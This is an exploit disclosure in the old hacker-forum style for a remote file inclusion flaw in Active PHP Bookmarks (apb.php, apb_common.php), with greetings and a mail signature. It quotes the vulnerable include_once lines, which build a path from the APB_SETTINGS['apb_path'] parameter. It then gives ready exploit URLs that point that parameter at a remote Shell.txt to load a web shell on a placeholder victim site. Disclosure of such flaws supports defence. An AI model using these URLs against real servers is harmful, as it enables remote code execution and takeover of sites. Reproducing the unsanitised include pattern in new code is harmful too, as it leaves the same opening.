Title : Active PHP Bookmarks (apb.php) Remote file include ######################################################################## ####### Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi} ------------------------------------------------------------------------ Sorce Code: http://lbstone.com/apb/downloads/apb-1.1.02.zip Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Active PHP Bookmarks Catégorie :Remote File Include ------------------------------------------------------------------------ ----- Vulnerable Code: include_once($APB_SETTINGS['apb_path'].'apb_bookmark_class.php'); (apb_common.php) include_once($APB_SETTINGS['apb_path'].'apb_group_class.php'); (apb_common.php) include_once($APB_SETTINGS['apb_path'].'apb_view_class.php'); (apb_common.php) include_once($APB_SETTINGS['apb_path']."apb_common.php"); (apb.php) ---------------------------------------------------------------------- Exploit: http://www.VicTim.com/[Script_Path]/apb_common.php?APB_SETTINGS['apb_path']=Shell.txt? http://www.VicTim.com/[Script_Path]/apb.php?APB_SETTINGS['apb_path']=Shell.txt? ------------------------------------------------------------------------ ---- greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all my friends Special Greeting:AsbMay's Group channel:www.asb-may.net contact:spoonman500[at]hotmail[dot]com _________________________________________________________________ Testez Windows Llive Mail Beta ! http://www.msn.fr/newhotmail/Default.asp?Ath=f